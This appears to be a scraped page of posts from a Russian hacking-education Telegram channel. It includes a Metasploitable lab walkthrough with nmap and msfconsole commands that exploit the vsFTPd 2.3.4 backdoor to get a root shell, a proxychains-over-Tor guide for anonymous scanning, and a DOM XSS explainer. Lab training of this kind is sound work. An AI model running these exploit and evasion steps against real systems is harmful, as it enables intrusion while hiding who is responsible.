Получи случайную криптовалюту за регистрацию!

Hacked by Python

Логотип телеграм канала @hackedbypython — Hacked by Python H
Логотип телеграм канала @hackedbypython — Hacked by Python
Адрес канала: @hackedbypython
Категории: Технологии
Язык: Русский
Количество подписчиков: 1.36K
Описание канала:

О хакинге и кибербезопасности просто и понятно
Чат: https://t.me/zametkiitshnika4at
ДЛЯ ОСОБО ОДАРЕННЫХ: РЕКЛАМА НА ВАШЕМ КАНАЛЕ НЕ ИНТЕРЕСУЕТ‼️
Цена и покупка рекламы: https://t.me/hbptnprice

Рейтинги и Отзывы

4.00

3 отзыва

Оценить канал hackedbypython и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

1

4 звезд

1

3 звезд

1

2 звезд

0

1 звезд

0


Последние сообщения 3

2021-11-08 21:17:37 ​​ Metasploitable: Пример атаки

Всем Асап! Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.

#Начало сканирования
Пишем в kali linux следующую компанду:
sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

search ftp

use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

Set payload payload/cmd/interact.

set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

Exploit

И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)

И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.

Конечно я выбрал ту уязвимость которую уже мало где встретишь, но в следующем посте мы рассмотрим кое-что более реальное. Всем спасибо и скоро увидимся!
752 views18:17
Открыть/Комментировать
2021-11-06 17:04:08 Этапы взлома информационных систем

Всем Асап. Сегодня я постараюсь рассказать про основные этапы взлома информационных систем. Давайте приступим.

1. Enumiration (Перечисление). Это процесс в котором мы буквально перечисляем все порты и сервисы на сервере. И действуем в соответствии с тем, что нашли.

2. Выявление необычных технологий которые могли бы быть легко уязвимы для нас. Продумывание того, как они могут быть связаны с основной системой и так далее.

3. Анализ на наличие уязвимостей. В данном случае имеет смысл производить с помощью программного обеспечения (Nessus, OpenVas). Однако это можно сделать и самому, зная как эксплуатировать тот или иной протокол или уязвимость.

4. Эксплуатация. Мы применяем эксплойт или возможно находим способ как проникнуть в систему, обойдя защиту, которая есть.

5. Пост-эксплуатация. Обычно под термином "Пост-эксплуатация" понимается процесс повышение привилегий. Ведь зачастую задача стоит в том, что надо получить права root пользователя. Повышение привилегий - большой отдельный процесс который заслуживает серию постов. Но об этом позже.
895 views14:04
Открыть/Комментировать
2021-11-05 21:10:42 Что такое прокси сервер?

Всем Асап. Сегодня мы поговорим про прокси серверы. Зачастую при пентестинге да и просто во время работы в IT, вы можете столкнуться с таким понятием как прокси.

Прокси сервер - это выделенный сервер, который нужен в качестве промежуточного во время соединения от одного сервера к другому. Например прокси сервер может использоваться для анонимизации траффика в сети. Однако в таком случае лучше, взять готовую цепочку прокси серверов.

Тот же самый тор сам по себе и есть цепочка прокси, входных и выходных нод. Сейчас в интернете вы можете найти огромное количество сайтов, куда выкладываются огромное количество бесплатных листов с прокси серверами. Все с разной степенью, скорости, анонимности и портами. Однако все что вам надо знать это:

1) Есть прокси SOCKS4 и SOCKS5.
2) Второе лучше первого ибо поддерживает поддержку UDP.

Используя proxychains с прошлого поста мы можем построить свою цепочку прокси, которая сделает наш траффик не таким легко отлеживаемым для провайдера и владельцев сайтов которые мы посещаем.
963 views18:10
Открыть/Комментировать
2021-11-02 14:46:19 Картинки нету потому что, бот через который я выкладываю посты решил, что ее тут быть не должно
307 views11:46
Открыть/Комментировать
2021-11-02 14:44:06 Анонимность с proxychains

Всем Асап! Сегодня я научу Вас основам работы с proxychains. Это очень полезное программное обеспечение, которое я буквально недавно открыл для себя.

Proxychains - программное обеспечение, которое позволяет нам проводить проксимизацию то есть использовать множественное количество прокси серверов для анонимности. Это может помочь нам скрыть свой реальный ip адрес и остаться неизвестным для тех кто захочет нас найти!

#Дисклеймер
Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

#Установка
Если у Вас нету proxychains, то вы можете его установить:
sudo apt install proxychains

#Находим конфиг
Теперь настроим конфиг для работы. Поэтому пишем команду для того чтобы его найти.
locate proxycains
Первый конфиг который вы увидите будет тем, что мы ищем.

#Редактируем конфиг для корректной работы
Смело идем туда чтобы исправить что все что надо, используя любой редактор текста. Знаю что все используют Vim но я всегда пользуюсь Nano.

Sudo nano /etc/proxychains4.conf

Вам надо будет убрать знак # перед dynamic_cahin и перед proxy_dns.
В первом случае если вы не уберете решетку, то proxychains просто не будет работать.
Во втором случае proxy_dns позволит Вам проксировать ваш DNS запрос. Так как, если вы этого не сделаете, то DNS останется вашим и Вас будет элементарно вычислить не смотря на смену IP адреса.

Смысл состоит в том, чтобы добавить прокси серверы в самом конце как и написано в примере. Сначала вид протокол потом IP адрес потом порт. И если есть логин и пароль то их тоже следует добавить.

#Добавляем конечным узлом наш прокси
Однако, если вы хотите анонимно просканировать сервер с помощью nmap то лучше всего включить проксирование через TOR, но тут есть момент, что возможно, мы столкнемся с ситуацией, когда сканирование не удастся, потому что конечные точки Tor заблокированы. Поэтому добавляем туда в конец обычный прокси сервер. Чтобы Сначала траффик шел от нас по серверам тор и проходил через наш новый прокси.

#Включаем TOR

Вклюючить проксирование через TOR можно написав в конце конфига и предварительно включить TOR:
sudo service tor start

В самом конфиге в конце пишем:
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050

И последним может быть ваш прокси сервер после этих двух строчек. Такие дела. Скоро увидимся
322 views11:44
Открыть/Комментировать
2021-11-02 10:00:23
Нет идей для проектов? В канале Replit публикуются интересные приложения с готовым кодом.

Если еще нет коммерческого опыта, но нужно наполнить портфолио — подпишись. Тут проекты, написанные на разных языках программирования, которые ты сможешь повторить: приложения, сервисы, игры, боты и много чего ещё.
276 views07:00
Открыть/Комментировать
2021-10-29 22:21:17
Чего бы вам хотелось больше тут увидеть?
Anonymous Poll
42%
Больше взаимодействия с командной строкой.
32%
Больше мыслей про it, pentesting и тд.
14%
Оставь все как есть!
12%
Узнать результаты.
133 voters349 views19:21
Открыть/Комментировать
2021-10-29 22:17:24
357 views19:17
Открыть/Комментировать
2021-10-27 19:56:25 ​​ XSS уязвимости на примере Ч. 3

Всем Асап это Pyth0nn, а это завершающий пост про XSS на примере. Сегодня я постараюсь объяснить что такое XSS на основе dom.

#Что такое DOM?
DOM расшифровывается как D ocument O bject M odel и представляет собой программный интерфейс для документов HTML и XML. Он представляет собой страницу, так что программы могут изменять структуру, стиль и содержимое документа. Веб-страница - это документ, и этот документ может отображаться в окне браузера или в качестве источника HTML.

#Использование DOM
XSS на основе DOM - это место, где выполнение JavaScript происходит непосредственно в браузере без загрузки каких-либо новых страниц или передачи данных в серверный код. Выполнение происходит, когда код JavaScript веб-сайта воздействует на ввод или взаимодействие с пользователем.

#Пример сценария:
JavaScript веб-сайта получает содержимое из window.location.hash параметра и затем записывает его на страницу в просматриваемом в данный момент разделе. Содержимое хэша не проверяется на наличие вредоносного кода, что позволяет злоумышленнику внедрить JavaScript по своему выбору на веб-страницу.


#Возможное воздействие:
созданные ссылки могут быть отправлены потенциальным жертвам, перенаправляя их на другой веб-сайт или украдя контент со страницы или сеанса пользователя.

#Как протестировать XSS на основе Dom:
XSS на основе DOM может быть сложной задачей для тестирования и требует определенных знаний JavaScript для чтения исходного кода. Вам нужно будет искать части кода, которые обращаются к определенным переменным, над которыми злоумышленник может иметь контроль, например, к параметрам « window.location.x ».
262 views16:56
Открыть/Комментировать
2021-10-25 03:04:54 ​​Всем Асап! Сорян за ночное "включение", просто кто-то перешёл на ночной образ жизни, как настоящая змея.

Теперь перейдем к закону, который обязывает нас регистрироваться в мессенджерах по паспорту. Вобщем создаётся впечатление, что либо я чего-то совсем не догоняю, либо человек создавший данный закон далеко не понимает как это должно работать.

В чем соль? Достаточно погуглить, чтобы узнать, что наши паспортные данные мессенджеру должен будет предоставить наш оператор связи, которым Вы пользуетесь. Но для этого самому мессенджеру надо знать данные о пользователе, к которому этот пасспорт прикреплен. И в таком случае они смогут обменяться данными. Замкнутый круг.

Никогда не поверю что какой-нибудь большой оператор связи предоставит данные о пользователях мессенджеру. В основном это же зарубежные компании по типу Facebook и так далее. Про Viber не слова, само собой.

Так же чтобы это реализовать нужны деньги на сервера по обработке и передачи данных, а как известно по нашему опыту с пакетом яровой деньги на них либо найдены не были, либо все это куда-то быстро кануло. Опять забыли про это. Как же так!

И как вишенка на торте - супер дорогое программное обеспечение для осуществления этого комплексного процесса. И можно даже нагуглить инфу, что его ещё не начали создавать его, хотя осталось полтора года до вступления в силу данного законопроекта.

Вобщем как итог, думаю, что будет повторение закона яровой и максимум что нас ждёт если они что-то сделают это большие утечки данных. А значит звонит из "банка" будет в два раза чаще. Не паникуйте. К счастью, у людей предлагающих такие законопроекты недостаточно грамотности в IT сфере, чтобы придумать что-то толковое.

Однако, при серьезных покушениях на нашу частную жизнь, мы с вами ни за что не отдадим интернет. Никакой деанонимизации в сети!
744 viewsedited  00:04
Открыть/Комментировать